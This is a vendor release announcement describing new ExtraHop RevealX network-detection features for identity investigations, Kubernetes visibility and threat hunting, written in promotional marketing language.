New in RevealX: Detect More, Investigate Faster with Capabilities for Identity, Kubernetes, and Threat Hunting

We are excited to share with you the latest capabilities focused on enhancing identity investigations, cloud visibility, and threat hunting within the ExtraHop RevealX platform.

This release delivers holistic visibility into the most challenging aspects of today’s attack surfaces: identity-based attacks, ephemeral workloads,and encrypted evasive activity, to help teams stop advanced AI-assisted attacks faster.

These new capabilities will help fuel the future of enterprise agentic operations with deep protocol analysis and rich network telemetry and provide the foundational intelligence that is critical to successfully transitioning to AI-driven security operations.

Identity Threat Investigations

With valid users and their devices now a significant attack vector, identity context has become crucial for determining who is truly behind an activity and understanding the full scope of what occurred. Attackers are increasingly targeting users through social engineering, credential abuse, token theft, making identity context crucial for understanding who is behind the activity and what really happened.

In this latest release we are making identity a seamless and powerful part of every investigation by integrating with market-leading identity systems Entra ID, Active Directory (AD), and Okta. By adding enriched user data into detections, new risky user dashboards, and in-platform response actions, ExtraHop gives analysts and AI agents richer context for faster insights, sharper pivots, and reduced Mean-time-to-Response (MTTR).

You can now enhance user profiles in RevealX with contextual data including titles, managers, and departments for deeper visibility into identity relationships.This integration of user data into your workflow gives you a stronger, identity-focused understanding of user actions and whether or not this is normal behavior or potentially malicious. This critical context eliminates the need for multiple pivots to other systems, instantly clarifying for your analysts whether a user's behavior is normal activity or potentially malicious. These new capabilities enable you to prioritize identity in your investigations by making users as visible and searchable as devices across ExtraHop.

Entra ID User Enrichment in RevealX

New Entra ID dashboards clearly highlight unusual user activity and admin activity affecting user accounts. These new dashboards give analysts a high-level view of identity-driven risk and the ability to drill into the signals that matter. By pairing cloud-based identity signals with the deep network visibility we already provide, we’re giving you a more complete view of how users behave across their environment and where that behavior might be a risk to your organization.

New Entra ID Risky User Detections and Dashboards in RevealX

These latest identity integrations are now available for public preview to help your security teams quickly identify suspicious risky user behavior, confirm lateral movement, and confidently determine the blast radius of a compromised account.

Kubernetes Visibility

In 2026, visibility into Kubernetes (K8s) is no longer a nice-to-have monitoring feature. It’s a critical business requirement. Kubernetes has evolved from a container orchestrator into the control plane for cloud-native infrastructure and now AI-native infrastructure. The stakes for maintaining a clear view of its internals have skyrocketed.

The most significant shift we expect to see in 2026 is the migration of AI/ML workloads from experimental labs to production Kubernetes clusters. Clear visibility allows operations teams to monitor latency and resource efficiency, ensuring that AI models respond without draining the budget. Kubernetes is notoriously elastic, which is great for scaling, but dangerous for driving up costs. Clean data also ensures that AI agents can effectively automate actions. For example, whether a human is in-the-loop or not, it’s difficult to heal a cluster if the underlying telemetry is noisy or incomplete.

For security teams, the shift to production AI workloads in Kubernetes creates new attack surfaces. Adversaries increasingly target containerized environments for cryptomining, data exfiltration, and as pivot points for lateral movement. A kernel-level container escape can potentially compromise all containers on that node and the underlying host, giving the threat actor access to sensitive data across all containers. Traditional perimeter and endpoint security tools struggle with the ephemeral, dynamic nature of containers—making network-level visibility essential for detecting threats that exploit this gap.

ExtraHop now helps operations teams mitigate risks in Kubernetes environments by delivering enhanced visibility, revealing a more complete picture of what is happening within your Kubernetes cluster and across hybrid environments. For example, ExtraHop:

• correlates K8s behavior with identity data to detect a container making a call using a hijacked credential
• correlates K8s behavior with threat intelligence to detect if a third-party container image in your K8s cluster is communicating with a known, malicious nation-state C2 server
• sees threats in encrypted traffic with the ability to decrypt service-to-service communication using mTLS
• preserves a history of record to ensure the “reason for death” is saved after a pod is replaced, and for future investigation, auditing, and compliance

On the Assets page, users see links to all pods and nodes (each as a device). Select the pod or node to see Kubernetes properties such as namespace, cluster, deployment, ReplicaSet, and more.

ExtraHop details the properties of a Kubernetes pod

Threat Hunting & Investigation Enhancements

ExtraHop continues to invest in both threat hunting and detection capabilities in this release with three new features. JA4+ fingerprinting now unmasks hidden attackers in encrypted traffic when decryption isn’t an option. ExtraHop is now the first NDR solution to provide the full NDR-addressable* JA4+ fingerprinting suite as part of the built-in offering. ExtraHop was an early adopter of the TLS client fingerprint and provided a lot of the initial feedback on JA4+, as evidenced in the “JA4+ was created by” section of GitHub. We’ve also integrated Hunt.io threat intelligence for sharper identification of C2 infrastructure, and a brand new PowerShell detection to spot lateral movement and modern exploit techniques.

ExtraHop can decrypt and determine the intent of remote PS commands when executed over encrypted protocols

Finally, we’ve included a new Threat Briefing for React2Shell. The combination of these features exposes the advanced persistent threats designed for EDR evasion.

Additional updates in this release include a new Microsoft Defender for XDR integration, in-product IDS rule catalog, new beta for the Extrahop Query Language (EQL), and a new virtual all-in-one sensor.

Microsoft Defender - The RevealX + Defender for XDR integration gives analysts critical device context within RevealX, accelerating threat investigation and reducing MTTR with unified forensics.

IDS Rule Catalog - The new rule catalog gives customers clear transparency into the curated ExtraHop IDS ruleset enabling auditability and insights into the latest CVE coverage available within the platform.

ExtraHop Query Language (EQL) Beta - Now ExtraHop makes the entire breadth of network telemetry more actionable to analysts with direct access to the EQL. Currently available in beta, EQL unlocks the high-performance network data engine for the entire security stack.

New All-In-One, 1370v Sensor - Offering 1Gbps support for Network Detection and Response (NDR), Network Performance Monitoring (NPM), Packet Forensics, and Intrusion Detection System (IDS) modules in a single, virtual sensor.

RevealX Enterprise Integration Marketplace - Expanded technology partner integrations to our RevealX Enterprise customers

Current customers can always reach out to their account managers for personalized walk-throughs of the latest release, check out release notes for more granular details, or join the customer community to discuss with peers.

Schedule a demo today to discover how these new capabilities can transform your network and security operations.